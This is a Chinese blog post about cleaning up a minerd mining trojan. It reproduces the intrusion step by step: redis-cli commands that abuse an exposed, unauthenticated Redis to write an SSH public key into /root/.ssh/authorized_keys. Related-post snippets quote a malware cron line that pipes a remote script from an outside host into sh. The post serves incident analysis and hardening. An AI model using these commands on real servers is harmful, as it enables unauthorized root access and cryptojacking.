minerd木马攻击处理(2)

杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢

我发现我的redis的 bind 0.0.0.0:6379

默认的。。。。应该是这边进来的。我自己做了下尝试。。。

[[email protected]_sas01 ~/.ssh]# redis-cli

127.0.0.1:6379> set aa "公钥"

OK

127.0.0.1:6379> config set dir /root/.ssh/

OK

127.0.0.1:6379> config set dbfilename "authorized_keys"

OK

127.0.0.1:6379> save

[[email protected]_sas01 ~/.ssh]# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABdadasdAAQEAvPgr/WFKd9h/3e2ik6BmLj4OIdnBNJelaNCOAWwdKQx0WjDtFjN/BvO3vkg4awwYwp3K+UyAGob438pZnqNR37d1RrU7OzBolJ9NnTLPF03gI2aZpfW439T167bxHmKWYzN5vexTNv2orKWaQxMJtjN3xAwzpxiugaiguoleTTxBKG9TFjjBDblLYAoaVdylRLQLUwfCJ/WK50rK++hawBS15t6r9/zTuMD5TCsAJNEN88cPDOuEcnNwtLydtftH1BX3tPISSHtS4VwTr/LdAz40O9lKTTeU/JDHSIIRr95u2Y6/mhaLJwwLp/AFUB/NtF3HOIY75yG/F5k0q1fCaw== [email protected]

夭寿拉。妈蛋的竟然真的这样可以吧自己的公钥刷进来。。。

奉劝大家不要黑别人的服务器,运维何苦为难运维。。。

通过这个网站可以查到开放的数据,就不给大家公开了,我得数据可能就是在这里被获取的。

黑客攻击事件到此完了

时间: 2024-08-10 18:35:57

minerd木马攻击处理(2)的相关文章

minerd木马攻击处理(1)

阿里云上报警提示有异地IP登陆,上去之后发现服务器被黑了.以下是处理过程: 木马排查 1,首先top发现有minerd对CPU的占有达到了100%,此前这台服务器上是没有跑任何应用的,直觉告诉我minerd有问题哦 [[email protected]_sas01 ~/.ssh]# ps aux|grep minerd root 7174 99.6 0.1 239504 5400 ? SLsl 15:08 29:05 /opt/minerd -B -a cryptonight -o stratu

【安全预警】暗云Ⅲ木马攻击预警

根据阿里云收到的最新安全威胁情报,近日,腾讯安全研究团队监控到暗云Ⅲ通过下载站大规模传播,可能与DDoS攻击相关并引发大规模攻击事件.该病毒通过感染磁盘MBR来实现开机启动,感染用户数量巨大,是目前已知复杂度最高感染用户数量最大的木马之一.此病毒还兼容X86.X64两种版本的XP.Win7等操作系统,影响范围十分广泛.同时该木马主要通过外挂.游戏辅助.私服登录器等传播,此类软件通常诱导用户关闭安全软件后使用,使得木马得以乘机植入. 阿里云安全提醒您关注该事件并做好安全防护. 1.影响范围有哪些?

PHP防止木马攻击的措施

防止跳出web目录 只允许你的PHP脚本在web目录里操作,针对Apache,还可以修改httpd.conf文件限制PHP操作路径. 例如:php_admin_value  open_basedir(将用户可操作的文件限制在某目录下)  web目录. 在Linux系统中web根目录有个.user.ini文件,修改该文件与修改httpd.conf文件效果一样. .user.ini文件文档介绍: 自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件.此类文

企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了

问题: 一个 lamp 的服务器站点目录下所有文件均被植入如下内容 <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164> 包括图片文件也被植入了,网站打开时就会调用这个地址,造成的影响很恶劣. 实际解决办法: 思路是:需要遍历所有目录有文件 把以上被植入的内容删除掉. 1.  先备份数据.然后,执行命令批量修改回来. 2.  a.备份原始出问题的原始文件: b.历史备份覆盖:c.find+s

阿里云主机遭受minerd类型攻击

现象:就是cpu使用率超级大,能到300% 木马脚本内容: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * cu

minerd挖矿木马

由于用的是临时服务器,安全性上疏忽了,导致受到了minerd木马攻击,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理. 现状描述 1 top可以看到,这个minerd 程序把cpu跑满了 2 ps aux | grep minerd 可知是这个程序: /opt/minerd --- 这个不是我们自己启动的,可以断定服务器被黑了 这个进程是root用户启动的,代码有漏洞可能性不大(web服务是www用户启动的),多半黑客已经登录服务器了 3 有可能是免密登录了,去/roo

黑客可借App漏洞攻击手机银行客户端,爱加密为移动支付App提供安全防护!

安卓系统安全问题一直以来被业界所诟病.近日有安全报告指出,安卓手机系统漏洞严重威胁网民支付安全.利用安卓系统漏洞,黑客可以对手机银行客户端实施注入攻击,截获用户银行账号密码,造成财产损失.进行测试的16款手机银行客户端均未能防御此类攻击.    据中国互联网络信息中心(cnnic)的数据显示,由于中国手机支付用户规模成倍增长(同比增长126.9%),截止2013年12月已达1.25亿,移动支付成为大趋势.而伴随这一趋势产生的移动支付安全问题也"水涨船高".近年来,由于遭受木马.恶意插件

2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与实现

参考文献: 木马攻击与隐蔽技术研究 线程注入式无进程木马的实现原理 木马技术研究及反弹木马系统的设计与实现 原文地址:https://www.cnblogs.com/zhangshuai9345/p/10897818.html

疑似Groip123 (APT37) 攻击事件记录

文章摘自腾讯安全 原文地址:https://s.tencent.com/research/report/831.html 一.事件概述 腾讯御见威胁情报中心在2019年8月底到9月中旬,检测到一批针对疑似中韩贸易等相关人士的钓鱼攻击活动.经过分析溯源发现,疑似是Group123攻击组织的最新攻击活动. Group123,又被称为APT37,疑似来自朝鲜的攻击组织,该组织经常攻击国内的外贸公司.在华外企高管,甚至政府部门.该组织最常使用鱼叉钓鱼邮件进行定向攻击,使用Nday或者0day漏洞进行木马